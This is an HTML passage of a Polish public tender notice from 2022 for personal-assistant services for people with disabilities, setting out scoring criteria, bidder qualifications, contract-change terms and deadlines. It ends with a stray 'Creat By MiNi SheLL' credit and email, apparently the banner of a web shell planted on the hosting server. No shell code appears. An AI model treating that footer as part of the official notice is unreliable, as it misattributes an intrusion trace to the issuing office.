kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym (na podstawie np. umowy o pracę, umowy o wolontariat, zaświadczenia lekarskiego, oświadczenia w przypadku opiekuna faktycznego), w tym zawodowe, wolontariackie lub osobiste, wynikające z pełnienia roli opiekuna faktycznego Do 6 miesięcy - 0 punktów powyżej 6 miesięcy do 12 miesięcy - 12 punktów powyżej 12 miesięcy do 18 miesięcy - 18 punktów powyżej 18 miesięcy do 24 miesięcy - 24 punktów powyżej 24 miesięcy do 30 miesięcy - 30 punktów powyżej 30 miesięcy - 37 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">37</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy): a)	wykształcenie w zakresie: pedagogika specjalna, terapia zajęciowa lub praca socjalna; tak- 1 punkt, nie - 0 punktów b)	ukończone szkolenia/kursy z zakresu wsparcia osób z niepełnosprawnością i/lub niesamodzielnych, opiekun osoby niepełnosprawnej tak - 1 punkt, nie - 0 punktów; c)	kurs pierwszej pomocy przedmedycznej tak - 1 punkt, nie - 0 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W odniesieniu do wszystkich części zamówienia:<br/>1. O udzielenie zamówienia w odniesieniu do wszystkich części zamówienia (od części 1 do części 4) mogą ubiegać się<br/>Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu,<br/>2) spełniają warunki udziału w postępowaniu.<br/>2. Na podstawie art. 112 ust. 2 pkt 4 ustawy Pzp, Zamawiający określa warunki w postępowaniu dotyczące zdolności technicznej lub zawodowej w odniesieniu do wszystkich części zamówienia (część od 1 do części 4):<br/>1) dotyczy Wykonawców prowadzących działalność gospodarczą:<br/>Wykonawca lub osoby skierowane przez Wykonawcę do realizacji usług asystenta w odniesieniu do każdej części zamówienia (część od 1 do części 4):<br/>a) posiadają dokument potwierdzający uzyskanie kwalifikacji w następujących kierunkach: asystent osoby niepełnosprawnej (zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 7 sierpnia 2014 r. w sprawie klasyfikacji zawodów i specjalności na potrzeby rynku pracy oraz zakresu jej stosowania (t.j. Dz. U. z 2018 r. poz. 227), opiekun osoby starszej,<br/>opiekun medyczny, pedagog, psycholog, terapeuta zajęciowy, pielęgniarka, fizjoterapeuta lub<br/>b) posiadają co najmniej 6 – miesięczne, udokumentowane doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym np. doświadczenie zawodowe, udzielanie wsparcia osobom niepełnosprawnym w formie wolontariatu,<br/>c) posiadają biegłą znajomość języka polskiego w mowie i piśmie,<br/>d) posiadają pełną zdolność do czynności prawnych oraz korzystają z pełni praw publicznych,<br/>e) dysponują stanem zdrowia pozwalającym na świadczenie usług asystenta osobistego osoby niepełnosprawnej,<br/>f) posiadają odpowiednie predyspozycje osobowościowe oraz kompetencje personalne i społeczne tj.: empatia, cierpliwość, dyskrecja, odporność na stres, kultura osobista, umiejętność słuchania, umiejętność<br/>nawiązywania kontaktu z innymi,<br/>g) muszą zapewniać ciągłość realizacji usługi oraz nie będą podlegały wymianie na inną osobę w trakcie realizacji zamówienia, z wyjątkiem sytuacji losowych po zaakceptowaniu przez Zamawiającego,<br/>h) Wykonawca/każda z osób skierowanych przez Wykonawcę do realizacji zamówienia nie może być prawomocnie skazana<br/>za umyślne przestępstwo ścigane<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi z oskarżenia publicznego lub umyślne przestępstwo skarbowe,<br/>i) Wykonawca/każda z osób skierowanych przez Wykonawcę do realizacji zamówienia nie może być prawomocnie skazana za umyślne przestępstwo przeciwko życiu i zdrowiu (art. 148 – 164 K.K.), przestępstwo przeciwko wolności (art. 189-194 K.K.), przestępstwo przeciwko wolności seksualnej i obyczajności (art. 197-204 K.K.), przestępstwo przeciwko rodzinie i opiece (art. 206 – 208, 210-211a K.K.), przestępstwo przeciwko wiarygodności dokumentów (art. 270 – 277 d K.K.), przestępstwo przeciwko mieniu (art. 278 – 282 K.K.),<br/>j) co do warunków określonych w lit. a i b wystarczy spełnienie jednego z nich, co do warunków określonych w lit. c – i muszą być spełnione łącznie.<br/>2) Ponadto, Wykonawca prowadzący działalność gospodarczą lub osoby skierowane przez Wykonawcę do realizacji usług asystenta osobistego osoby niepełnosprawnej w odniesieniu do części zamówienia: część 4 (tj. w<br/>zakresie usług świadczonych na rzecz dzieci niepełnosprawnych do 16. roku życia z orzeczeniem o niepełnosprawności łącznie z wskazaniami: konieczności stałej lub długotrwałej opieki lub pomocy innej osoby w związku ze znacznie ograniczoną możliwością samodzielnej egzystencji oraz konieczność stałego współudziału na co dzień opiekuna dziecka w procesie leczenia, rehabilitacji i edukacji) muszą posiadać:<br/>a) zaświadczenie o niekaralności;<br/>b) pisemną informację o niefigurowaniu w Rejestrze Sprawców Przestępstw na Tle Seksualnym;<br/>3) Zamawiający od Wykonawców prowadzących działalność gospodarczą żąda: oświadczenia o spełnianiu warunków udziału w postępowaniu (według wzoru określonego w Załączniku nr 3 do SWZ);<br/>4) dotyczy Wykonawców będących osobami fizycznymi nieprowadzącymi działalności gospodarczej – warunkiem udziału w postępowaniu jest:<br/>a) posiadanie dokumentu potwierdzający uzyskanie kwalifikacji w następujących kierunkach: asystent osoby niepełnosprawnej (zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 7 sierpnia 2014 r. w sprawie klasyfikacji zawodów i specjalności na potrzeby rynku pracy oraz zakresu jej stosowania (t.j. Dz. U. z 2018 r. poz. 227) opiekun osoby starszej, opiekun medyczny, pedagog, psycholog, terapeuta zajęciowy, pielęgniarka, fizjoterapeuta lub<br/>b) posiadanie co najmniej 6 – miesięcznego, udokumentowanego doświadczenia w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym np. doświadczenie zawodowe, udzielanie wsparcia osobom niepełnosprawnym w formie wolontariatu,<br/>c) posiadanie biegłej znajomości języka polskiego w mowie i piśmie,<br/>d) posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,<br/>e) dysponowanie stanem zdrowia pozwalającym na świadczenie ww. usług,<br/>f) posiadanie odpowiednich predyspozycji osobowościowych oraz kompetencji personalnych<br/>i społecznych tj.: empatia, cierpliwość, dyskrecja, odporność na stres, kultura osobista, umiejętność słuchania, umiejętność<br/>nawiązywania kontaktu z innymi,<br/>g) zapewnienie ciągłość realizacji usługi z wyjątkiem sytuacji losowych po zaakceptowaniu przez Zamawiającego,<br/>h) osoba nie może być prawomocnie skazana za umyślne przestępstwo ścigane z oskarżenia publicznego lub umyślne<br/>przestępstwo skarbowe,<br/>i) osoba nie może być prawomocnie skazana za umyślne przestępstwo przeciwko życiu i zdrowiu (art. 148 – 164 K.K.),<br/>przestępstwo przeciwko wolności (art. 189-194 K.K.), przestępstwo przeciwko wolności seksualnej i obyczajności (art. 197-<br/>204 K.K.), przestępstwo przeciwko rodzinie i opiece (art. 206 – 208, 210-211a K.K.), przestępstwo przeciwko wiarygodności<br/>dokumentów (art. 270 – 277 d K.K.), przestępstwo przeciwko mieniu (art. 278 – 282 K.K.),<br/>j) co do warunków określonych w lit. a i b wystarczy spełnienie jednego z nich, co do warunków określonych w lit. c – i muszą<br/>być spełnione łącznie.<br/>5) Wykonawca będący osobą fizyczną nieprowadzącą działalności gospodarczej w przypadku realizacji usług asystenta<br/>osobistego osoby niepełnosprawnej w odniesieniu do części zamówienia: część 4 (tj. w zakresie usług świadczonych na rzecz dzieci niepełnosprawnych do 16. roku życia z orzeczeniem o niepełnosprawności łącznie z wskazaniami: konieczności stałej lub długotrwałej opieki lub pomocy innej osoby w związku ze znacznie ograniczoną możliwością samodzielnej egzystencji oraz konieczność stałego współudziału na co dzień opiekuna dziecka w procesie leczenia, rehabilitacji i edukacji) musi posiadać:<br/>a) zaświadczenie o niekaralności;<br/>b) pisemną informację o niefigurowaniu w Rejestrze Sprawców Przestępstw na Tle Seksualnym;<br/>6) Zamawiający od Wykonawców będących osobami fizycznymi nieprowadzącymi działalności gospodarczej żąda<br/>oświadczenia o spełnianiu warunków udziału w postępowaniu (według wzoru określonego w załączniku nr 4 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o których mowa w art. 125 ust. 1 PZP</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dla wszystkich części zamówienia:<br/>1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki <br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika <br/>z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5.W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy PZP składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>1) oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>2) oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6.Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają formy pisemnej w postaci aneksów do umowy, pod rygorem nieważności.<br/>2. W przypadkach przewidzianych w umowie lub ustawie Prawo zamówień publicznych dopuszcza się możliwość wprowadzenia zmian za zgodą Zamawiającego.<br/>3. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>4. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, chyba że nastąpiły następujące okoliczności uzasadniające zmiany:<br/>1) niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy,<br/>2) zmiany stawki podatku VAT lub innych regulacji prawnych, obowiązujących przepisów, wprowadzonych w życie po dacie podpisania umowy.<br/>6. Warunkiem dokonania zmian, o których mowa w ust. 4, jest złożenie wniosku przez stronę inicjującą zmianę<br/>zawierającego:<br/>1) opis propozycji zmiany,<br/>2) uzasadnienie zmiany,<br/>3) obliczenie kosztów zmiany zgodnie z zasadami zawartymi w umowie,<br/>4) opis wpływu zmiany na termin wykonania umowy,<br/>5) opis przyczyny zmiany terminu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W odniesieniu do zadań od numeru 1 do numer 4: <br/>1.	Usługi asystenta opisane w zadaniach nie mogą być świadczone przez członków rodziny, opiekunów prawnych lub osoby faktycznie zamieszkujące razem z uczestnikiem Programu. Za członków rodziny uznać należy rodziców i dzieci, rodzeństwo, wnuki, dziadków, teściów, macochę, ojczyma oraz inne osoby pozostające we wspólnym gospodarstwie domowym z uczestnikiem Programu. <br/>2.	Minimum 70% uczestników Programu stanowić będą osoby wymagające wysokiego poziomu wsparcia w tym osoby z niepełnosprawnościami sprzężonymi i trudnościami związanymi z mobilnością i komunikacją.<br/>3.	Miejsce wykonania zamówienia województwo podkarpackie.<br/><br/>W przypadku gdy usługa asystenta będzie świadczona na rzecz dzieci niepełnosprawnych do 16 roku życia z orzeczeniem o niepełnosprawności łącznie z ww. wskazaniami, tj. zadania nr 4 wymagane jest od osoby świadczącej usługę asystenta osobistego osoby niepełnosprawnej posiadanie: zaświadczenie o niekaralności, pisemnej informacji o niefigurowaniu w Rejestrze Sprawców Przestępstw na Tle Seksualnym oraz pisemnej akceptacja osoby asystenta ze strony rodzica lub opiekuna prawnego dziecka z niepełnosprawnością.<br/>Informacja dla wykonawców, w tym prowadzących działalność gospodarczą, osób prawnych, jednostek organizacyjnych nieposiadających osobowości prawnej kierujących do realizacji zamówienia osoby zatrudnione na podstawie umów o pracę. <br/><br/>1. WYMAGANIA DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY :<br/>Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br/>2. INFORMACJA NA TEMAT MOŻLIWOŚCI ROZLICZANIA SIĘ W WALUTACH OBCYCH:<br/>Dla wszystkich części zamówienia:<br/>Zamawiający będzie rozliczał się z Wykonawcą wyłącznie w walucie polskiej (PLN).<br/>3. OFERTY WARIANTOWE<br/>Dla wszystkich części zamówienia:<br/>Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej ani nie wymaga złożenia oferty wariantowej, o której<br/>mowa w art. 92 ustawy Pzp tzn. oferty przewidującej odmienny sposób wykonania zamówienia niż określony w niniejszej<br/>SWZ.<br/>4. INFORMACJA O PRZEDMIOTOWYCH ŚRODKACH DOWODOWYCH<br/>Dla wszystkich części zamówienia:<br/>Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>5. TAJEMNICA PRZEDSIĘBIORSTWA<br/>Dla wszystkich części zamówienia:<br/>a) W sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa,<br/>wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że<br/>zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji.<br/>b) W przypadku, gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji<br/>elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>6) WYMAGANIA DOTYCZĄCE WADIUM<br/>Dla wszystkich części zamówienia:<br/>Zamawiający nie wymaga wniesienia wadium.<br/>Przedmiot umowy finansowany jest ze środków pochodzących z Funduszu Solidarnościowego przyznanych w ramach<br/>Programu Ministerstwa Rodziny i Polityki Społecznej Program &#34;Asystent osobisty osoby niepełnosprawnej&#34; edycja 2022.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Paulina Cebula, tel. 13 43 204 59 email: pcebula@moprkrosno.pl,<br/>Halina Matusz, tel. 13 43 204 59, email: hmatusz@moprkrosno.pl,<br/>Katarzyna Koszelnik – Biały, tel. 13 43 204 59, email: kkoszelnik@moprkrosno.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com